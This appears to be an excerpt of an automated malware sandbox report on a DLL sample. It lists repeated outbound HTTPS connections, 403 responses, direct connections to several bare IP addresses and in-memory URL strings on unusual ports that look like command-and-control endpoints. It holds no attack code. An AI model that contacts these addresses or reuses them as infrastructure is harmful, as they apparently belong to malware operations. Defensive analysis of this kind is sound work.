                      Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50158
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50182 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:32 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:40 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:42 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:46:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:03 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:04 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:08 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:47 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:47:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:11 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:15 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:19 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:23 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:26 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:27 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:30 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:31 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:34 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:35 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:38 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:39 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:43 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:46 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:48 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:50 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:54 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:56 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:48:58 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:01 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:02 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:05 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:06 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:13 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:14 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:17 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:18 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:49:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 77EC63BDA74BD0D0E0426DC8F8008506.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabx?
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enp
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214/A
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.571195607.0000000000785000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmp, rundll32.exeString found in binary or memory: https://143.244.140.214:808/
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/.140.214:808/
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/G
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/U
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/Z
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/c
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/h
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.623291100.000000000077D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.631441493.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.503888662.000000000077C000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.680511463.000000000077E000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/oft
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://143.244.140.214:808/q
                      Source: loaddll32.exe, 00000000.00000003.462282089.0000000000785000.00000004.00000001.sdmpString found in binary or memory: https://143.244.140.214:808/x
                      Source: loaddll32.exe, 00000000.00000003.680511463.000000000077E000.00000004.00000001.sdmpString found in binary or memory: https://18192.46.210.220/
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47/)
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.503888662.000000000077C000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.680511463.000000000077E000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.462282089.0000000000785000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/9
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/Q
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/a
                      Source: loaddll32.exe, 00000000.00000003.579545200.0000000000785000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/oft
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.623291100.000000000077D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.462282089.0000000000785000.00000004.00000001.sdmpString found in binary or memory: https://185.56.219.47:8116/soft
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/
                      Source: rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.419169035.0000000000785000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220//
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/;
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/B
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/Certification
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/M
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/R
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/V
                      Source: rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/Y
